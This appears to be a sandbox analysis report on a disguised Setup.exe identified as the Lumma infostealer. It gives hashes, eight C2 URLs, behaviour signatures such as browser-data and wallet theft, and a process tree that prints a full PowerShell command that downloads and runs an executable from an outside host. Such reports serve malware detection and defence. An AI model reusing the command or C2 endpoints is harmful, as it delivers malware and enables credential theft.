Overview

overview

10

Static

static

3

πŸŒΌπ’©οΏ½...up.exe

windows10-ltsc 2021-x64

10

πŸŒΌπ’©οΏ½...up.exe

windows11-21h2-x64

10

πŸŒΌπ’©οΏ½...up.exe

windows7-x64

3

Analysis

  • max time kernel
    145s
  • max time network
    152s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250217-en
  • resource tags

    arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    01/03/2025, 12:53

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    πŸŒΌπ’©π‘’π“Œβœ³π‚π“Έπ’Ήπ‘’βœ¨πΞ±Ο„Β’Π½-π“˜nst𝒢ll@9192/Setup.exe

  • Size

    168KB

  • MD5

    aef6452711538d9021f929a2a5f633cf

  • SHA1

    205b7fab75e77d1ff123991489462d39128e03f6

  • SHA256

    e611a1ffbe9e08a2660bc290a581aa0b54637524aaf6040a70e54f97136ce5ac

  • SHA512

    7ad84d4d3bab3f5a3e14f336d8931bf4b876299000081b2a94a3fcf698c56b82514753b483c5b8d7ae84ddd92ee1c4043fa5e7fb7c4f7e9eb52ca8c794e508b7

  • SSDEEP

    3072:+CNUaViEqjY1uimO3soWBgZNENeo0TzSCOtCUon/BA2gGaA44:dwEq7HO8ohEsxHSC+CUO/Bxk4

Score
10/10
lummadiscoveryexecutionspywarestealer

Malware Config

Extracted

Family

lumma

C2

https://impend-differ.biz/api

https://print-vexer.biz/api

https://dare-curbys.biz/api

https://covery-mover.biz/api

https://formy-spill.biz/api

https://dwell-exclaim.biz/api

https://zinc-sneark.biz/api

https://se-blurry.biz/api

Signatures

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    stealerlumma
  • Lumma family
    lumma
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Powershell Invoke Web Request.

    execution
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\πŸŒΌπ’©π‘’π“Œβœ³π‚π“Έπ’Ήπ‘’βœ¨πΞ±Ο„Β’Π½-π“˜nst𝒢ll@9192\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\πŸŒΌπ’©π‘’π“Œβœ³π‚π“Έπ’Ήπ‘’βœ¨πΞ±Ο„Β’Π½-π“˜nst𝒢ll@9192\Setup.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:4356
    • C:\Users\Admin\AppData\Roaming\XXX\GGFCBEFKQTKF\Caller.exe
      C:\Users\Admin\AppData\Roaming\XXX\GGFCBEFKQTKF\Caller.exe
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3960
    • C:\Windows\SysWOW64\more.com
      C:\Windows\SysWOW64\more.com
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:3376
      • C:\ProgramData\Lawai.com
        C:\ProgramData\Lawai.com
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2768
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -exec bypass -f "C:\Users\Admin\AppData\Local\Temp\B6ZS0CPMTMN319BPARX.ps1"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4916
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -exec bypass -f "C:\Users\Admin\AppData\Local\Temp\JQLXWVOSYZ4PC4Z6G1259PP0S4K.ps1"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1056
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -exec bypass $Response = Invoke-WebRequest -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36' -Uri 'https://myspecialdot.com/api/download' -UseBasicParsing $TempFile = [System.IO.Path]::GetTempFileName() $FilePath = "$($TempFile).exe" [System.IO.File]::WriteAllBytes($FilePath, $Response.Content) Start-Process -FilePath $FilePath
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:764

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\Lawai.com
    Filesize

    921KB

    MD5

    3f58a517f1f4796225137e7659ad2adb

    SHA1

    e264ba0e9987b0ad0812e5dd4dd3075531cfe269

    SHA256

    1da298cab4d537b0b7b5dabf09bff6a212b9e45731e0cc772f99026005fb9e48

    SHA512

    acf740aafce390d06c6a76c84e7ae7c0f721731973aadbe3e57f2eb63241a01303cc6bf11a3f9a88f8be0237998b5772bdaf569137d63ba3d0f877e7d27fc634

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    Filesize

    1KB

    MD5

    5b74da6778ccaa0e1ca4ae7484775943

    SHA1

    0a2f6f315a0ca1a0366b509aec7b13c606645654

    SHA256

    172282931d7eeb60228e6b9b4b913fd78c73f2a7855620f35fb24a5c847b6c78

    SHA512

    20b4cb7174f49b22426b249f1dfc8f6273f50d1502536e773f4dcd073bf027f2a554d2437c2dc628dbe021c5c3b968b2d89f810ff1bb19630c1560e7feee1a1a

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    15KB

    MD5

    472abc68cf7d7e8247dbba4b93bd7631

    SHA1

    1853b2d43cc4ef4ad5fbad5da55d402bd2b4934b

    SHA256

    65b2e0c5b527fc000830dc35086e1c93881bd700d857e542fdc6156212fe7c13

    SHA512

    2b37e18a0cdaafaadce45ca1227cafbe2c24b3c83d0f8d56a047da662dd2b6de71fc13924e6a102a146905c617d182e9e618d13b56788813f18846be3400ab26

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    19KB

    MD5

    9b18cd4d6c2faa38ebc8a17b3a6981c0

    SHA1

    836031792b62410e1941c4888256b0c311ce64ff

    SHA256

    5c9412caf98bc624e6b8e08c07cf925f094cf76a98f4f9347cef688dbdf2059b

    SHA512

    60e014799e6dc48033a36a815a21d7030707785fa2fa1d1f6ab678ff23f1082a4fd71b827ded0470cfc1371100db1e7c55973be690044564c66599b89b69d06a

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\23512682
    Filesize

    6.1MB

    MD5

    0e6bf39b4fb446a59fee31f14ae84484

    SHA1

    ce7dd22511dfccc2cae21922cd08fc1a04bfbb66

    SHA256

    e2f5f856df7b242063bef9e5fd211ef79ec6db66c2dc0f32e05dee11d36c1e28

    SHA512

    e0010be3121a2c89bf6abfcd30606c85d7056d85246bd4d8725967eb118137ea4cb11953084789279e848dbad696627d3eab3d44605358ac6201105d8920bad0

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\B6ZS0CPMTMN319BPARX.ps1
    Filesize

    3KB

    MD5

    9ef303f48303b543c7dea68f560fe795

    SHA1

    5a6f91757e10df8f07077ec9ab463f0f67bb582f

    SHA256

    464507f2c132da0b5aaa45f95372871dd14c42d1a156ac746f602aa41ccfbb2e

    SHA512

    7f16fbfac763bb940fab1083a990c0b1527c3e9e38276e8c1cb13b3622c6b426f129d6c79d7d42cffe5ec7e3490f0afef41a154c85baf503b3b27b26f8e66f0d

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\JQLXWVOSYZ4PC4Z6G1259PP0S4K.ps1
    Filesize

    474B

    MD5

    108a846fce8e14bec7a3a8c2850d8ed1

    SHA1

    44075cdd5403feadd753986ce39fbc672ca9c69a

    SHA256

    300c5bfa2b54a6c48fb592ba9f2a164dc92d796688f3e43112e696e68a09ed88

    SHA512

    c2f03dad5d470b779de7e2fe36e26c3b112b4f82db76cd5ebd30da71649f1f26326db0632b1dc2bcbe7b80804d4dc8d878b058ce9798bd5d35b722212f6c78da

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mntqol5b.d5a.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\XXX\GGFCBEFKQTKF\Caller.exe
    Filesize

    4.2MB

    MD5

    2018644aac84a2de8a767ec1da19993e

    SHA1

    4ec18507a02d88f49a089851e773c082327ffa42

    SHA256

    d2251490ca5bd67e63ea52a65bbff8823f2012f417ad0bd073366c02aa0b3828

    SHA512

    4b171ce616756ace308b61d3d2cc43ced952ce4dc04360ab18499cc959cbf08dc5331610f7bb59c34fcdcb72694b455dc556757cba4cb1ed17b78503bcc26c48

    Download Submit

  • memory/764-90-0x0000000008050000-0x00000000080E6000-memory.dmp

    Filesize

    600KB

    Download

  • memory/764-83-0x00000000078A0000-0x0000000007F1A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/764-84-0x00000000067F0000-0x000000000680A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/764-91-0x0000000007FB0000-0x0000000007FD2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/764-80-0x0000000006350000-0x000000000639C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/764-79-0x00000000062B0000-0x00000000062CE000-memory.dmp

    Filesize

    120KB

    Download

  • memory/764-92-0x00000000086A0000-0x0000000008C46000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/2768-44-0x00007FFA25120000-0x00007FFA25329000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/2768-42-0x0000000000A30000-0x0000000000A84000-memory.dmp

    Filesize

    336KB

    Download

  • memory/2768-50-0x0000000000A30000-0x0000000000A84000-memory.dmp

    Filesize

    336KB

    Download

  • memory/3376-43-0x0000000075E71000-0x0000000075E7F000-memory.dmp

    Filesize

    56KB

    Download

  • memory/3376-32-0x0000000075E71000-0x0000000075E7F000-memory.dmp

    Filesize

    56KB

    Download

  • memory/3376-34-0x00007FFA25120000-0x00007FFA25329000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/3376-36-0x0000000075E70000-0x0000000076472000-memory.dmp

    Filesize

    6.0MB

    Download

  • memory/4356-27-0x00000000023D0000-0x0000000003D01000-memory.dmp

    Filesize

    25.2MB

    Download

  • memory/4356-23-0x0000000075E70000-0x0000000076472000-memory.dmp

    Filesize

    6.0MB

    Download

  • memory/4356-2-0x000000000242B000-0x0000000002D08000-memory.dmp

    Filesize

    8.9MB

    Download

  • memory/4356-3-0x0000000000700000-0x0000000000701000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4356-4-0x00000000023D0000-0x0000000003D01000-memory.dmp

    Filesize

    25.2MB

    Download

  • memory/4356-8-0x0000000075E70000-0x0000000076472000-memory.dmp

    Filesize

    6.0MB

    Download

  • memory/4356-9-0x00007FFA25120000-0x00007FFA25329000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4356-29-0x0000000075E70000-0x0000000076472000-memory.dmp

    Filesize

    6.0MB

    Download

  • memory/4356-28-0x000000000242B000-0x0000000002D08000-memory.dmp

    Filesize

    8.9MB

    Download

  • memory/4356-0-0x00000000022F0000-0x00000000023C1000-memory.dmp

    Filesize

    836KB

    Download

  • memory/4916-51-0x0000000004D00000-0x0000000004D22000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4916-47-0x0000000000BC0000-0x0000000000BF6000-memory.dmp

    Filesize

    216KB

    Download

  • memory/4916-49-0x0000000004F40000-0x000000000556A000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/4916-52-0x0000000004EA0000-0x0000000004F06000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4916-53-0x0000000005570000-0x00000000055D6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4916-70-0x00000000055E0000-0x0000000005937000-memory.dmp

    Filesize

    3.3MB

    Download